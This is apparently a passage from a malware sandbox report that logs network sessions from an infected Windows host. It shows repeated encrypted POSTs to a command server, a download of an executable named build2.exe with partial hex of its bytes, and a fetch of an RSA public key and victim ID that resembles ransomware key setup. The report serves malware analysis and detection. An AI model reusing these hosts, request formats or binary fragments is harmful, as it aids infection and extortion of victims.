May 25, 2024 21:29:34.665553093 CEST	1236	IN	Data Raw: ff 00 74 13 a9 00 00 00 ff 74 02 eb cd 8d 41 ff 8b 4c 24 04 2b c1 c3 8d 41 fe 8b 4c 24 04 2b c1 c3 8d 41 fd 8b 4c 24 04 2b c1 c3 8d 41 fc 8b 4c 24 04 2b c1 c3 cc cc cc cc cc 57 56 8b 74 24 10 8b 4c 24 14 8b 7c 24 0c 8b c1 8b d1 03 c6 3b fe 76 08 Data Ascii: ttAL$+AL$+AL$+AL$+WVt$L$\|$;v;h%`s3u%J%`svs~vftcf
May 25, 2024 21:29:34.665564060 CEST	1236	IN	Data Raw: 8e 14 89 44 8f 14 8b 44 8e 10 89 44 8f 10 8b 44 8e 0c 89 44 8f 0c 8b 44 8e 08 89 44 8f 08 8b 44 8e 04 89 44 8f 04 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 34 35 40 00 8b ff 44 35 40 00 4c 35 40 00 5c 35 40 00 70 35 40 00 8b 44 24 0c 5e 5f c3 90 Data Ascii: DDDDDDDDD$45@D5@L5@\5@p5@D$^_FGD$^_IFGFGD$^_FGFGFGD$^_$Wte$fofoNfoV fo^0ffOfW f_0fof@fonPfov`fo~pf
May 25, 2024 21:29:34.673690081 CEST	1236	IN	Data Raw: b6 c0 0f be 80 10 a4 4a 00 03 c8 41 85 ff 75 d1 8d 85 fc ef ff ff 2b f0 8d 04 31 e9 72 01 00 00 8b bd f0 ef ff ff 8b 04 bd 20 60 d0 02 8b bd d8 ef ff ff f6 44 01 04 80 8b 85 f4 ef ff ff 74 19 8b 95 e4 ef ff ff eb 07 80 3a 0a 75 01 47 42 3b d6 72 Data Ascii: JAu+1r `Dt:uGB;ru .u!9Xu+ppj `[DjS;u?B+J;B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49745	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:36.317305088 CEST	283	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cmovmgvridjjk.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 355 Host: trad-einmyus.com
May 25, 2024 21:29:36.317392111 CEST	355	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 84 de 9b 66 5d 02 c9 a1 c1 64 15 da a2 35 Data Ascii: ?v1y5eCDhTz\Fu$f]d5xrllRL#$8_kIYv14UlsRe\|el2~4:.<GCVYI<b4T{d1;N+rx3*ueamlURs8@B\k;6G
May 25, 2024 21:29:37.062428951 CEST	597	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:29:36 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED] Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49747	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:37.086112976 CEST	283	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uopmqrlryhqym.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 178 Host: trad-einmyus.com
May 25, 2024 21:29:37.086112976 CEST	178	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 98 66 5d 02 c8 a1 c1 64 27 b5 d1 37 Data Ascii: ?v1y5eCDhTz\Fu$f]d'7Axt5cHU=)r@:TllN=A*W~Q dd_?&+:;XQvIB$lmx=
May 25, 2024 21:29:37.940068007 CEST	597	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:29:37 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED] Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49748	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:37.997029066 CEST	281	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kdrrcifvupv.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 283 Host: trad-einmyus.com
May 25, 2024 21:29:37.997049093 CEST	283	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 99 66 5d 02 c8 a1 c1 64 17 da b5 07 Data Ascii: ?v1y5eCDhTz\Fu$f]d+z?GfO65]dB^OZeBF/HC5;:w/p((2U(gW<C28(r6/!sMDTd&VAda61u\|nkJ
May 25, 2024 21:29:38.724839926 CEST	597	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:29:38 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED] Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49749	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:38.780399084 CEST	284	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://froejfbfqcabvk.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 123 Host: trad-einmyus.com
May 25, 2024 21:29:38.780457020 CEST	123	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 96 66 5d 02 c8 a1 c1 64 5a a9 92 6b Data Ascii: ?v1y5eCDhTz\Fu$f]dZkZdh^&_g3s}05n("H
May 25, 2024 21:29:39.499422073 CEST	156	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:29:39 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49750	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:39.561779976 CEST	286	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ijjaoopskaipyfot.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 199 Host: trad-einmyus.com
May 25, 2024 21:29:39.561814070 CEST	199	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 97 66 5d 02 c8 a1 c1 64 14 9a af 03 Data Ascii: ?v1y5eCDhTz\Fu$f]d;jEaLh4Z\-_m~&bUxJIR"2XzO<>iVY$<TF\wyy3#\|xj"@lm/[1
May 25, 2024 21:29:40.299617052 CEST	156	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:29:40 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49752	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:40.316894054 CEST	282	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qlrqehiwqptv.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 329 Host: trad-einmyus.com
May 25, 2024 21:29:40.316912889 CEST	329	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 94 66 5d 02 c8 a1 c1 64 01 d5 b8 29 Data Ascii: ?v1y5eCDhTz\Fu$f]d)<^9P!{uB^}Z.ocK{$8'at?]2bW]-)T,TBJL\Q*5{$~RYo1^h0x<;wjZqKciP:R$
May 25, 2024 21:29:41.079699039 CEST	156	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:29:40 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49753	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:41.129514933 CEST	282	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jkukpjjesbti.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 280 Host: trad-einmyus.com
May 25, 2024 21:29:41.135246992 CEST	280	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 95 66 5d 02 c8 a1 c1 64 28 a2 80 66 Data Ascii: ?v1y5eCDhTz\Fu$f]d(f:Gd@4N_,LCN >W6j!zZBBJKu-GQ2f^`R)mZ.A9poEJ9ggW}4JtOMd"Fh[,
May 25, 2024 21:29:41.987983942 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:29:41 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 33 35 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 90 51 10 25 01 f1 a0 89 b3 bf 05 ab 11 df 76 be 59 51 96 01 bf ea 26 ed 65 5e 12 b3 f2 92 4a f5 04 0d 0a 30 0d 0a 0d 0a Data Ascii: 35I:82OQ%vYQ&e^J0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49754	189.163.126.89	80	2764	C:\Users\user\AppData\Local\Temp\E609.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:41.205625057 CEST	91	OUT	GET /dl/build2.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: sdfjhuz.com
May 25, 2024 21:29:42.380868912 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 25 May 2024 19:29:42 GMT Content-Type: application/octet-stream Content-Length: 232448 Last-Modified: Wed, 22 May 2024 09:20:03 GMT Connection: close ETag: "664db8c3-38c00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 14 2a 8b 75 75 44 d8 75 75 44 d8 75 75 44 d8 78 27 9b d8 6d 75 44 d8 78 27 a4 d8 03 75 44 d8 78 27 a5 d8 52 75 44 d8 7c 0d d7 d8 72 75 44 d8 75 75 45 d8 11 75 44 d8 c0 eb a1 d8 74 75 44 d8 78 27 9f d8 74 75 44 d8 c0 eb 9a d8 74 75 44 d8 52 69 63 68 75 75 44 d8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 8f f9 5f 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 dc 00 00 00 18 88 02 00 00 00 00 7f 36 00 00 00 10 00 00 00 f0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 89 02 00 04 00 00 5c 36 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1*uuDuuDuuDx'muDx'uDx'RuD\|ruDuuEuDtuDx'tuDtuDRichuuDPEL_e6@\6PP(wQ`F@\.text `.rdatahj@@.data@ `J@.rsrc(wx@@
May 25, 2024 21:29:42.382752895 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 54 6f c8 02 e8 e9 01 00 00 68 a9 ea 40 00 e8 74 22 00 00 59 c3 b9 5c 6f c8 02 e8 3c 02 00 00 Data Ascii: Toh@t"Y\o<h@^"YHoh@H"YjPojDo\|jXoojLobUE]UE8u3]PY]U}uE]]U}uE]
May 25, 2024 21:29:42.387357950 CEST	1236	IN	Data Raw: d3 e8 89 45 f4 8b 45 dc 01 45 f4 8b 45 f4 33 45 f8 31 45 fc 8b 45 fc 29 45 ec 8d 4d f0 e8 a9 fe ff ff 4f 74 0b 8b 5d f0 8b 4d d8 e9 fe fe ff ff 8b 7d d0 8b 45 ec 89 77 04 89 07 5f 5e 5b 8b e5 5d c3 56 8b 35 38 6f c8 02 c1 ee 03 57 8b 3d c4 69 c8 Data Ascii: EEEE3E1EE)EMOt]M}Ew_^[]V58oW=it{Nu_^UQeEEi]U0SV3W=(@S8q Fr\|8osAKQS<o8o8@MiQj@58oP
May 25, 2024 21:29:42.387393951 CEST	1236	IN	Data Raw: 65 f0 8b 45 f0 b8 3c 82 2d 6d f7 65 dc 8b 45 dc 81 6d f8 8f f8 a0 2f 81 6d d0 7c 01 a6 42 81 45 f0 2b d2 04 5f 81 45 fc f4 60 30 0f 81 45 e4 50 dd de 4d b8 27 de f0 22 f7 65 e8 8b 45 e8 b8 c8 66 70 6d f7 65 bc 8b 45 bc 81 45 dc 85 45 ad 41 81 6d Data Ascii: eE<-meEm/m\|BE+_E`0EPM'"eEfpmeEEEAmeACj02eEeEojeEEqEE-SlfeEmDoxm_9Rmw4mTem{mP-36}WWWWW@WWWH@[aFp\|=8o
May 25, 2024 21:29:42.398611069 CEST	864	IN	Data Raw: e8 a2 01 00 00 8b c8 8b c1 c3 55 8b ec 51 8d 45 ff 50 e8 01 fe ff ff 8b c8 e8 4e 01 00 00 33 d2 42 3b c2 8d 48 ff 0f 46 ca 8b c1 8b e5 5d c3 b8 70 ea 40 00 e8 c9 cb 00 00 83 ec 14 53 56 8b 75 08 57 8b f9 89 65 f0 89 7d e4 83 ce 0f e8 b8 ff ff ff Data Ascii: UQEPN3B;HF]p@SVuWe};su'3EOu;vW+4;veFPEPM]8EME@ePEEPTE@M}u]}vuPS
May 25, 2024 21:29:42.492794037 CEST	1236	IN	Data Raw: 8b c6 5e 5d c2 04 00 55 8b ec 83 ec 10 6a 01 8d 45 fc c7 45 fc cc ff 40 00 50 8d 4d f0 e8 fb 19 00 00 68 3c 4b 41 00 8d 45 f0 c7 45 f0 c4 ff 40 00 50 e8 b7 14 00 00 cc 55 8b ec 83 ec 0c 8b 45 08 8d 4d f4 89 45 08 8d 45 08 50 e8 a8 19 00 00 68 ac Data Ascii: ^]UjEE@PMh<KAEE@PUEMEEPhKAEE@PUEMEEPzhKAEE@P[WVt$L$\|$;v;h%)Cs3u%`A%)C
May 25, 2024 21:29:42.494750977 CEST	224	IN	Data Raw: 02 88 47 02 8a 46 01 c1 e9 02 88 47 01 83 ee 03 83 ef 03 83 f9 08 0f 82 56 ff ff ff fd f3 a5 fc ff 24 95 14 27 40 00 8d 49 00 c8 26 40 00 d0 26 40 00 d8 26 40 00 e0 26 40 00 e8 26 40 00 f0 26 40 00 f8 26 40 00 0b 27 40 00 8b 44 8e 1c 89 44 8f 1c Data Ascii: GFGV$'@I&@&@&@&@&@&@&@'@DDDDDDDDDDDDDD$'@$'@,'@<'@P'@D$^_FGD$^_IFGFGD$^_FGFGF
May 25, 2024 21:29:42.499389887 CEST	1236	IN	Data Raw: 01 88 47 01 8b 44 24 0c 5e 5f c3 8d a4 24 00 00 00 00 57 8b c6 83 e0 0f 85 c0 0f 85 d2 00 00 00 8b d1 83 e1 7f c1 ea 07 74 65 8d a4 24 00 00 00 00 90 66 0f 6f 06 66 0f 6f 4e 10 66 0f 6f 56 20 66 0f 6f 5e 30 66 0f 7f 07 66 0f 7f 4f 10 66 0f 7f 57 Data Ascii: GD$^_$Wte$fofoNfoV fo^0ffOfW f_0fof@fonPfov`fo~pfg@foPfw`fpJutOtfofvJut*tvIutFGIuX^_$
May 25, 2024 21:29:42.499423981 CEST	1236	IN	Data Raw: 40 00 60 2c 40 00 8b 44 24 0c 5e 5f c3 90 8a 06 88 07 8b 44 24 0c 5e 5f c3 90 8a 06 88 07 8a 46 01 88 47 01 8b 44 24 0c 5e 5f c3 8d 49 00 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 88 47 02 8b 44 24 0c 5e 5f c3 90 8d 74 31 fc 8d 7c 39 fc f7 c7 03 00 Data Ascii: @`,@D$^_D$^_FGD$^_IFGFGD$^_t1\|9u$r$-@$t-@Ir+$,@$-@,@,@$-@F#Gr$-@IF#GFGr$-@
May 25, 2024 21:29:42.499455929 CEST	1236	IN	Data Raw: 5f c3 55 8b ec 83 7d 08 00 75 15 e8 1d 14 00 00 c7 00 16 00 00 00 e8 a3 13 00 00 83 c8 ff 5d c3 56 8b 75 0c 85 f6 75 16 e8 00 14 00 00 c7 00 16 00 00 00 e8 86 13 00 00 83 c8 ff 5e 5d c3 ff 75 08 e8 b5 14 00 00 89 06 23 c2 89 56 04 59 83 f8 ff 74 Data Ascii: _U}u]Vuu^]u#VYt3Vjj YYVx@0,ujX^&3^jh(LAeSeu#YuEu.UQSV5\|@W505,EE;
May 25, 2024 21:29:42.508579969 CEST	1236	IN	Data Raw: b4 08 00 00 59 6a 01 e8 e6 08 00 00 59 85 c0 74 07 50 e8 a1 08 00 00 59 e8 36 38 00 00 56 50 6a 00 68 00 00 40 00 e8 66 e1 ff ff 8b f0 89 75 dc 85 db 75 06 56 e8 21 0b 00 00 e8 a4 08 00 00 eb 2e 8b 4d ec 8b 01 8b 00 89 45 e0 51 50 e8 50 26 00 00 Data Ascii: YjYtPY68VPjh@fuuV!.MEQPP&YYeuu}uVeENU=h3CuC0u0hYY]2;eAu8U VWjYA}u}ttQpP }

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49758	213.172.74.157	80	2764	C:\Users\user\AppData\Local\Temp\E609.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:43.452183008 CEST	139	OUT	GET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: cajgtus.com
May 25, 2024 21:29:44.401863098 CEST	761	IN	HTTP/1.1 200 OK Date: Sat, 25 May 2024 19:29:57 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 75 35 31 66 77 6e 51 79 38 55 75 2b 73 49 4a 6e 73 66 38 42 5c 5c 6e 66 53 69 7a 31 61 75 68 5a 74 4c 39 39 6a 48 62 75 64 32 37 79 42 32 34 78 54 58 6a 52 78 6e 46 5c 2f 71 55 44 6a 74 50 75 4d 7a 71 52 39 63 6e 6b 34 46 4d 34 62 44 37 33 77 51 52 72 64 52 46 68 5c 5c 6e 53 45 35 57 6b 31 31 76 74 6b 53 50 70 34 7a 43 4e 6e 58 37 69 4f 42 47 78 52 71 36 54 52 58 41 33 72 58 6c 4d 2b 50 75 6f 52 5a 4a 76 6f 53 6d 31 67 38 39 63 56 6e 6d 70 38 75 75 55 5a 67 4d 5c 5c 6e 30 45 74 6c 55 6b 62 48 57 4b 46 6b 72 33 4c 4e 47 5a 6c 33 33 68 55 6d 76 46 69 77 30 43 51 52 71 2b 54 34 44 49 7a 39 64 6e 4b 46 6f 53 43 4f 44 43 4f 41 59 4c 34 65 66 62 59 47 5a 69 6c 37 5c 5c 6e 63 33 5c 2f 48 7a 35 43 46 45 2b 66 65 56 54 [TRUNCATED] Data Ascii: {"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu51fwnQy8Uu+sIJnsf8B\\nfSiz1auhZtL99jHbud27yB24xTXjRxnF\/qUDjtPuMzqR9cnk4FM4bD73wQRrdRFh\\nSE5Wk11vtkSPp4zCNnX7iOBGxRq6TRXA3rXlM+PuoRZJvoSm1g89cVnmp8uuUZgM\\n0EtlUkbHWKFkr3LNGZl33hUmvFiw0CQRq+T4DIz9dnKFoSCODCOAYL4efbYGZil7\\nc3\/Hz5CFE+feVT+eU4zbNtCm4B7vyBvKN4sMiDRakJHQZsJZ4HdkUFj9OMqN774a\\nc6ikgCtTJdIBxE7Za7YoSYIPGvgA4k\/QNvqV6O6U73qNBe04kRxsZn83tIf65Evc\\nOQIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
